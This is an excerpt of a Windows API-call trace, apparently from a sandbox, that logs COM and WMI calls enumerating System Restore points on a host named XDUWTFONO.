WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe14d8) returned 0x0 [0122.403] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe14d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.403] WbemDefPath:IUnknown:Release (This=0xbe14d8) returned 0x3 [0122.403] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.403] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.403] WbemDefPath:IUnknown:Release (This=0x6024f98) returned 0x2 [0122.403] WbemDefPath:IUnknown:Release (This=0x6024f98) returned 0x1 [0122.403] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.403] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.403] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024f98, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6024f98) returned 0x0 [0122.404] WbemDefPath:IUnknown:AddRef (This=0x6024f98) returned 0x3 [0122.404] WbemDefPath:IUnknown:Release (This=0x6024f98) returned 0x2 [0122.404] WbemDefPath:IWbemPath:SetText (This=0x6024f98, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=9") returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.404] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.404] IWbemClassObject:Get (in: This=0x6024d30, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389f9ec*=0, plFlavor=0x389f9f0*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), pType=0x389f9ec*=19, plFlavor=0x389f9f0*=0) returned 0x0 [0122.572] IWbemClassObject:Get (in: This=0x6024d30, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389f9ec*=19, plFlavor=0x389f9f0*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), pType=0x389f9ec*=19, plFlavor=0x389f9f0*=0) returned 0x0 [0122.572] CoTaskMemAlloc (cb=0x4) returned 0xbe1518 [0122.572] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1518, puReturned=0x389bfe4 | out: apObjects=0xbe1518*=0x6025080, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.779] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6025080) returned 0x0 [0122.779] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.779] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.781] IUnknown:AddRef (This=0x6025080) returned 0x3 [0122.781] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.782] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.782] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6025084) returned 0x0 [0122.783] IMarshal:GetUnmarshalClass (in: This=0x6025084, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.783] IUnknown:Release (This=0x6025084) returned 0x3 [0122.783] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.785] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.785] IUnknown:QueryInterface (in: This=0x6025080, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.787] IUnknown:Release (This=0x6025080) returned 0x2 [0122.787] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.787] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.787] IUnknown:QueryInterface (in: This=0x6025080, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6025080) returned 0x0 [0122.787] IUnknown:AddRef (This=0x6025080) returned 0x4 [0122.787] IUnknown:Release (This=0x6025080) returned 0x3 [0122.787] IUnknown:Release (This=0x6025080) returned 0x2 [0122.787] CoTaskMemFree (pv=0xbe1518) [0122.787] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.787] IUnknown:AddRef (This=0x6025080) returned 0x3 [0122.787] IWbemClassObject:Get (in: This=0x6025080, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.787] IWbemClassObject:Get (in: This=0x6025080, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.787] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x70 [0122.787] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x70 [0122.788] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.788] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.788] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.788] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.789] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024880) returned 0x0 [0122.789] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024880, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.789] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024880, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025300) returned 0x0 [0122.789] WbemDefPath:IUnknown:Release (This=0x6024880) returned 0x0 [0122.789] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025300) returned 0x0 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.790] WbemDefPath:IUnknown:AddRef (This=0x6025300) returned 0x3 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1518) returned 0x0 [0122.790] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1518, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.790] WbemDefPath:IUnknown:Release (This=0xbe1518) returned 0x3 [0122.790] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.790] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.790] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x2 [0122.790] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x1 [0122.790] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.790] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.790] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025300) returned 0x0 [0122.790] WbemDefPath:IUnknown:AddRef (This=0x6025300) returned 0x3 [0122.790] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x2 [0122.790] WbemDefPath:IWbemPath:SetText (This=0x6025300, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=10") returned 0x0 [0122.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.790] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.790] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.790] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.791] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.791] IWbemClassObject:Get (in: This=0x6025080, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a0238*=0, plFlavor=0x38a023c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), pType=0x38a0238*=19, plFlavor=0x38a023c*=0) returned 0x0 [0122.791] IWbemClassObject:Get (in: This=0x6025080, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a0238*=19, plFlavor=0x38a023c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), pType=0x38a0238*=19, plFlavor=0x38a023c*=0) returned 0x0 [0122.791] CoTaskMemAlloc (cb=0x4) returned 0xbe1558 [0122.791] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1558, puReturned=0x389bfe4 | out: apObjects=0xbe1558*=0x6026368, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6026368) returned 0x0 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.792] IUnknown:AddRef (This=0x6026368) returned 0x3 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x602636c) returned 0x0 [0122.792] IMarshal:GetUnmarshalClass (in: This=0x602636c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.792] IUnknown:Release (This=0x602636c) returned 0x3 [0122.792] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.792] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.792] IUnknown:Release (This=0x6026368) returned 0x2 [0122.792] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.792] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.792] IUnknown:QueryInterface (in: This=0x6026368, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6026368) returned 0x0 [0122.792] IUnknown:AddRef (This=0x6026368) returned 0x4 [0122.792] IUnknown:Release (This=0x6026368) returned 0x3 [0122.792] IUnknown:Release (This=0x6026368) returned 0x2 [0122.793] CoTaskMemFree (pv=0xbe1558) [0122.793] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.793] IUnknown:AddRef (This=0x6026368) returned 0x3 [0122.793] IWbemClassObject:Get (in: This=0x6026368, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.793] IWbemClassObject:Get (in: This=0x6026368, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.793] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x70 [0122.793] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=11") returned 0x70 [0122.793] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.793] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.793] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.793] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.794] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024890) returned 0x0 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.794] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024890, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025370) returned 0x0 [0122.794] WbemDefPath:IUnknown:Release (This=0x6024890) returned 0x0 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025370) returned 0x0 [0122.794] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4fc00*(Data1=0xc3fcc19e, 